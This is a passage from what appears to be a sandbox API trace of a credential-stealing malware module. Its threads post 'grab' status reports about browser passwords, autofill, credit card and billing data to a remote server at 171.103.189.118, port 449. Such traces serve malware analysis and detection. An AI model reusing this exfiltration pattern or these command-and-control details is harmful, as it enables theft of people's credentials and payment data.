lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5 [0180.521] WinHttpOpenRequest (hConnect=0x338c9370, pwszVerb="POST", pwszObjectName="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/64/pwgrabb/DPST//", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x3396bcd0 [0180.522] WinHttpSetOption (hInternet=0x3396bcd0, dwOption=0x1f, lpBuffer=0x342aedb8, dwBufferLength=0x4) returned 1 [0180.522] WinHttpSendRequest (hRequest=0x3396bcd0, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary00E96A36\r\nContent-Length: 131\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x32e65a90*, dwOptionalLength=0x83, dwTotalLength=0x83, dwContext=0x0) returned 1 [0184.473] WinHttpReceiveResponse (hRequest=0x3396bcd0, lpReserved=0x0) returned 1 [0184.473] WinHttpQueryHeaders (in: hRequest=0x3396bcd0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x342aedb4, lpdwBufferLength=0x342aedbc, lpdwIndex=0x0 | out: lpBuffer=0x342aedb4*, lpdwBufferLength=0x342aedbc*=0x4, lpdwIndex=0x0) returned 1 [0184.473] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70b30 | out: hHeap=0x2150000) returned 1 [0184.473] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bd70 | out: hHeap=0x2150000) returned 1 [0184.473] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70110 | out: hHeap=0x2150000) returned 1 [0184.473] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e700e0 | out: hHeap=0x2150000) returned 1 [0184.474] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e76710 | out: hHeap=0x2150000) returned 1 [0184.474] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65a90 | out: hHeap=0x2150000) returned 1 [0184.474] Sleep (dwMilliseconds=0xbb8) [0187.553] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bb90 | out: hHeap=0x2150000) returned 1 [0187.553] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65a40 | out: hHeap=0x2150000) returned 1 [0187.553] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bd30 | out: hHeap=0x2150000) returned 1 [0187.553] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70530 | out: hHeap=0x2150000) returned 1 [0187.553] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65230 | out: hHeap=0x2150000) returned 1 [0187.553] WinHttpCloseHandle (hInternet=0x3396bcd0) returned 1 [0187.553] WinHttpCloseHandle (hInternet=0x338c9370) returned 1 [0187.553] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70b00 | out: hHeap=0x2150000) returned 1 Thread: id = 111 os_tid = 0x2a0 [0180.567] WinHttpConnect (hSession=0x71b780, pswzServerName="171.103.189.118", nServerPort=0x1c1, dwReserved=0x0) returned 0x338c9690 [0180.567] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ff60 [0180.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab autofill data: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0180.567] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70140 [0180.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab autofill data: ", cchWideChar=-1, lpMultiByteStr=0x32e70140, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Failed to grab autofill data: ", lpUsedDefaultChar=0x0) returned 31 [0180.567] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6ff90 [0180.567] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bd90 [0180.567] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70170 [0180.567] GetTickCount () returned 0xe96a65 [0180.567] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x100) returned 0x32e76f90 [0180.568] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32e42330 [0180.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x3432e750, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5 [0180.568] WinHttpOpenRequest (hConnect=0x338c9690, pwszVerb="POST", pwszObjectName="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/64/pwgrabb/DPST//", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x3396b190 [0180.568] WinHttpSetOption (hInternet=0x3396b190, dwOption=0x1f, lpBuffer=0x3432edb8, dwBufferLength=0x4) returned 1 [0180.568] WinHttpSendRequest (hRequest=0x3396b190, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary00E96A65\r\nContent-Length: 135\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x32e42330*, dwOptionalLength=0x87, dwTotalLength=0x87, dwContext=0x0) returned 1 [0181.260] WinHttpReceiveResponse (hRequest=0x3396b190, lpReserved=0x0) returned 1 [0181.260] WinHttpQueryHeaders (in: hRequest=0x3396b190, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x3432edb4, lpdwBufferLength=0x3432edbc, lpdwIndex=0x0 | out: lpBuffer=0x3432edb4*, lpdwBufferLength=0x3432edbc*=0x4, lpdwIndex=0x0) returned 1 [0181.260] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6ff90 | out: hHeap=0x2150000) returned 1 [0181.260] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bd90 | out: hHeap=0x2150000) returned 1 [0181.260] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70170 | out: hHeap=0x2150000) returned 1 [0181.260] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70140 | out: hHeap=0x2150000) returned 1 [0181.260] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e76f90 | out: hHeap=0x2150000) returned 1 [0181.260] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e42330 | out: hHeap=0x2150000) returned 1 [0181.260] Sleep (dwMilliseconds=0xbb8) [0184.328] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bbb0 | out: hHeap=0x2150000) returned 1 [0184.328] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e419d0 | out: hHeap=0x2150000) returned 1 [0184.328] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b910 | out: hHeap=0x2150000) returned 1 [0184.328] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6cf30 | out: hHeap=0x2150000) returned 1 [0184.328] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64af0 | out: hHeap=0x2150000) returned 1 [0184.328] WinHttpCloseHandle (hInternet=0x3396b190) returned 1 [0184.328] WinHttpCloseHandle (hInternet=0x338c9690) returned 1 [0184.328] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6ff60 | out: hHeap=0x2150000) returned 1 Thread: id = 112 os_tid = 0x9ac [0180.610] WinHttpConnect (hSession=0x71b780, pswzServerName="171.103.189.118", nServerPort=0x1c1, dwReserved=0x0) returned 0x338c9820 [0180.610] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fff0 [0180.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab credit card data: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0180.610] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cf0 [0180.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab credit card data: ", cchWideChar=-1, lpMultiByteStr=0x32e64cf0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Failed to grab credit card data: ", lpUsedDefaultChar=0x0) returned 34 [0180.610] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64c30 [0180.610] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234be90 [0180.610] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e701d0 [0180.610] GetTickCount () returned 0xe96a84 [0180.610] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x100) returned 0x32e770a0 [0180.610] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32e65b30 [0180.610] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x343ae750, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5 [0180.610] WinHttpOpenRequest (hConnect=0x338c9820, pwszVerb="POST", pwszObjectName="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/64/pwgrabb/DPST//", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x3396b550 [0180.610] WinHttpSetOption (hInternet=0x3396b550, dwOption=0x1f, lpBuffer=0x343aedb8, dwBufferLength=0x4) returned 1 [0180.610] WinHttpSendRequest (hRequest=0x3396b550, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary00E96A84\r\nContent-Length: 138\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x32e65b30*, dwOptionalLength=0x8a, dwTotalLength=0x8a, dwContext=0x0) returned 1 [0184.259] WinHttpReceiveResponse (hRequest=0x3396b550, lpReserved=0x0) returned 1 [0184.259] WinHttpQueryHeaders (in: hRequest=0x3396b550, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x343aedb4, lpdwBufferLength=0x343aedbc, lpdwIndex=0x0 | out: lpBuffer=0x343aedb4*, lpdwBufferLength=0x343aedbc*=0x4, lpdwIndex=0x0) returned 1 [0184.259] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c30 | out: hHeap=0x2150000) returned 1 [0184.259] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234be90 | out: hHeap=0x2150000) returned 1 [0184.259] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e701d0 | out: hHeap=0x2150000) returned 1 [0184.260] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cf0 | out: hHeap=0x2150000) returned 1 [0184.260] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e770a0 | out: hHeap=0x2150000) returned 1 [0184.260] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65b30 | out: hHeap=0x2150000) returned 1 [0184.260] Sleep (dwMilliseconds=0xbb8) [0187.279] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bbf0 | out: hHeap=0x2150000) returned 1 [0187.280] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32747620 | out: hHeap=0x2150000) returned 1 [0187.280] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234be70 | out: hHeap=0x2150000) returned 1 [0187.280] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6ffc0 | out: hHeap=0x2150000) returned 1 [0187.280] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64b30 | out: hHeap=0x2150000) returned 1 [0187.280] WinHttpCloseHandle (hInternet=0x3396b550) returned 1 [0187.280] WinHttpCloseHandle (hInternet=0x338c9820) returned 1 [0187.280] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fff0 | out: hHeap=0x2150000) returned 1 Thread: id = 113 os_tid = 0xbc0 [0180.654] WinHttpConnect (hSession=0x71b780, pswzServerName="171.103.189.118", nServerPort=0x1c1, dwReserved=0x0) returned 0x338c9b40 [0180.654] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70020 [0180.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab billing info data: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0180.654] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64db0 [0180.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab billing info data: ", cchWideChar=-1, lpMultiByteStr=0x32e64db0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Failed to grab billing info data: ", lpUsedDefaultChar=0x0) returned 35 [0180.654] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64cb0 [0180.654] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b7f0 [0180.654] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70200 [0180.654] GetTickCount () returned 0xe96ab3 [0180.654] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x100) returned 0x32e771b0 [0180.654] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32e65980 [0180.655] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x3442e750, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5 [0180.655] WinHttpOpenRequest (hConnect=0x338c9b40, pwszVerb="POST", pwszObjectName="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/64/pwgrabb/DPST//", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x3396b910 [0180.655] WinHttpSetOption (hInternet=0x3396b910, dwOption=0x1f, lpBuffer=0x3442edb8, dwBufferLength=0x4) returned 1 [0180.655] WinHttpSendRequest (hRequest=0x3396b910, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary00E96AB3\r\nContent-Length: 139\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x32e65980*, dwOptionalLength=0x8b, dwTotalLength=0x8b, dwContext=0x0) returned 1 [0184.057] WinHttpReceiveResponse (hRequest=0x3396b910, lpReserved=0x0) returned 1 [0184.057] WinHttpQueryHeaders (in: hRequest=0x3396b910, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x3442edb4, lpdwBufferLength=0x3442edbc, lpdwIndex=0x0 | out: lpBuffer=0x3442edb4*, lpdwBufferLength=0x3442edbc*=0x4, lpdwIndex=0x0) returned 1 [0184.057] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64cb0 | out: hHeap=0x2150000) returned 1 [0184.057] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b7f0 | out: hHeap=0x2150000) returned 1 [0184.057] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70200 | out: hHeap=0x2150000) returned 1 [0184.057] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64db0 | out: hHeap=0x2150000) returned 1 [0184.057] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e771b0 | out: hHeap=0x2150000) returned 1 [0184.057] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65980 | out: hHeap=0x2150000) returned 1 [0184.058] Sleep (dwMilliseconds=0xbb8) [0187.059] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b790 | out: hHeap=0x2150000) returned 1 [0187.059] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65920 | out: hHeap=0x2150000) returned 1 [0187.059] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b830 | out: hHeap=0x2150000) returned 1 [0187.059] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e708c0 | out: hHeap=0x2150000) returned 1 [0187.059] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64c70 | out: hHeap=0x2150000) returned 1 [0187.059] WinHttpCloseHandle (hInternet=0x3396b910) returned 1 [0187.059] WinHttpCloseHandle (hInternet=0x338c9b40) returned 1 [0187.059] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70020 | out: hHeap=0x2150000) returned 1 Thread: id = 114 os_tid = 0x127c [0180.684] WinHttpConnect (hSession=0x71b780, pswzServerName="171.103.189.118", nServerPort=0x1c1, dwReserved=0x0) returned 0x338c9cd0 [0180.684] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70230 [0180.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Grab_Passwords_Chrome(): Can't open database", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0180.684] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e64eb0 [0180.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Grab_Passwords_Chrome(): Can't open database", cchWideChar=-1, lpMultiByteStr=0x32e64eb0, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Grab_Passwords_Chrome(): Can't open database", lpUsedDefaultChar=0x0) returned 45 [0180.684] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e77d20 [0180.684] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b8b0 [0180.684] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70560 [0180.684] GetTickCount () returned 0xe96ad2 [0180.684] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x100) returned 0x32e76e80 [0180.684] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0xa0) returned 0x32e65cd0 [0180.685] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x344ae750, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5 [0180.685] WinHttpOpenRequest (hConnect=0x338c9cd0, pwszVerb="POST", pwszObjectName="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/64/pwgrabb/DEBG//", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x3396de90 [0180.685] WinHttpSetOption (hInternet=0x3396de90, dwOption=0x1f, lpBuffer=0x344aedb8, dwBufferLength=0x4) returned 1 [0180.685] WinHttpSendRequest (hRequest=0x3396de90, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary00E96AD2\r\nContent-Length: 149\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x32e65cd0*, dwOptionalLength=0x95, dwTotalLength=0x95, dwContext=0x0) returned 1 [0184.056] WinHttpReceiveResponse (hRequest=0x3396de90, lpReserved=0x0) returned 1 [0184.056] WinHttpQueryHeaders (in: hRequest=0x3396de90, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x344aedb4, lpdwBufferLength=0x344aedbc, lpdwIndex=0x0 | out: lpBuffer=0x344aedb4*, lpdwBufferLength=0x344aedbc*=0x4, lpdwIndex=0x0) returned 1 [0184.056] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e77d20 | out: hHeap=0x2150000) returned 1 [0184.056] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b8b0 | out: hHeap=0x2150000) returned 1 [0184.057] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70560 | out: hHeap=0x2150000) returned 1 [0184.057] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64eb0 | out: hHeap=0x2150000) returned 1 [0184.057] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e76e80 | out: hHeap=0x2150000) returned 1 [0184.057] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65cd0 | out: hHeap=0x2150000) returned 1 [0184.057] Sleep (dwMilliseconds=0xbb8) [0187.058] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b890 | out: hHeap=0x2150000) returned 1 [0187.058] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65c60 | out: hHeap=0x2150000) returned 1 [0187.058] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b850 | out: hHeap=0x2150000) returned 1 [0187.058] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e707a0 | out: hHeap=0x2150000) returned 1 [0187.058] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e64e70 | out: hHeap=0x2150000) returned 1 [0187.058] WinHttpCloseHandle (hInternet=0x3396de90) returned 1 [0187.058] WinHttpCloseHandle (hInternet=0x338c9cd0) returned 1 [0187.058] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70230 | out: hHeap=0x2150000) returned 1 Thread: id = 115 os_tid = 0x3a4 [0180.721] WinHttpConnect (hSession=0x71b780, pswzServerName="171.103.189.118", nServerPort=0x1c1, dwReserved=0x0) returned 0x338c9e60 [0180.721] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f510 [0180.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="unable to open database file", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0180.721] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fa20 [0180.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="unable to open database file", cchWideChar=-1, lpMultiByteStr=0x32e6fa20, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="unable to open database file", lpUsedDefaultChar=0x0) returned 29 [0180.721] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6fcf0 [0180.721] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234b970 [0180.721] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70620 [0180.721] GetTickCount () returned 0xe96af1 [0180.721] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x100) returned 0x32e76d70 [0180.721] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x3234bf30 [0180.721] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x3452e750, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="info", lpUsedDefaultChar=0x0) returned 5 [0180.722] WinHttpOpenRequest (hConnect=0x338c9e60, pwszVerb="POST", pwszObjectName="tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/64/pwgrabb/DEBG//", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x3396c090 [0180.722] WinHttpSetOption (hInternet=0x3396c090, dwOption=0x1f, lpBuffer=0x3452edb8, dwBufferLength=0x4) returned 1 [0180.722] WinHttpSendRequest (hRequest=0x3396c090, lpszHeaders="Content-Type: multipart/form-data; boundary=------Boundary00E96AF1\r\nContent-Length: 133\r\n\r\n", dwHeadersLength=0xffffffff, lpOptional=0x3234bf30*, dwOptionalLength=0x85, dwTotalLength=0x85, dwContext=0x0) returned 1 [0181.317] WinHttpReceiveResponse (hRequest=0x3396c090, lpReserved=0x0) returned 1 [0181.317] WinHttpQueryHeaders (in: hRequest=0x3396c090, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x3452edb4, lpdwBufferLength=0x3452edbc, lpdwIndex=0x0 | out: lpBuffer=0x3452edb4*, lpdwBufferLength=0x3452edbc*=0x4, lpdwIndex=0x0) returned 1 [0181.317] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fcf0 | out: hHeap=0x2150000) returned 1 [0181.317] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b970 | out: hHeap=0x2150000) returned 1 [0181.318] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70620 | out: hHeap=0x2150000) returned 1 [0181.318] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6fa20 | out: hHeap=0x2150000) returned 1 [0181.318] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e76d70 | out: hHeap=0x2150000) returned 1 [0181.318] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234bf30 | out: hHeap=0x2150000) returned 1 [0181.318] Sleep (dwMilliseconds=0xbb8) [0184.330] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b930 | out: hHeap=0x2150000) returned 1 [0184.330] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e65d80 | out: hHeap=0x2150000) returned 1 [0184.330] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x3234b8d0 | out: hHeap=0x2150000) returned 1 [0184.330] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e70590 | out: hHeap=0x2150000) returned 1 [0184.330] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e78320 | out: hHeap=0x2150000) returned 1 [0184.330] WinHttpCloseHandle (hInternet=0x3396c090) returned 1 [0184.330] WinHttpCloseHandle (hInternet=0x338c9e60) returned 1 [0184.330] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e6f510 | out: hHeap=0x2150000) returned 1 Thread: id = 116 os_tid = 0xbbc [0180.732] WinHttpConnect (hSession=0x71b780, pswzServerName="171.103.189.118", nServerPort=0x1c1, dwReserved=0x0) returned 0x338c83d0 [0180.732] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70680 [0180.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab passwords: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0180.732] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e706b0 [0180.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Failed to grab passwords: ", cchWideChar=-1, lpMultiByteStr=0x32e706b0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Failed to grab passwords: ", lpUsedDefaultChar=0x0) returned 27 [0180.732] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e706e0 [0180.732] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x3234bdb0 [0180.732] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70710 [0180.732] GetTickCount () returned 0xe96b10 [0180.732] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x100) returned 0x32e772c0 [0180.732] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x90) returned 0x32e50080 [0180.732] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="info", cchWideChar=-1, lpMultiByteStr=0x345ae750, 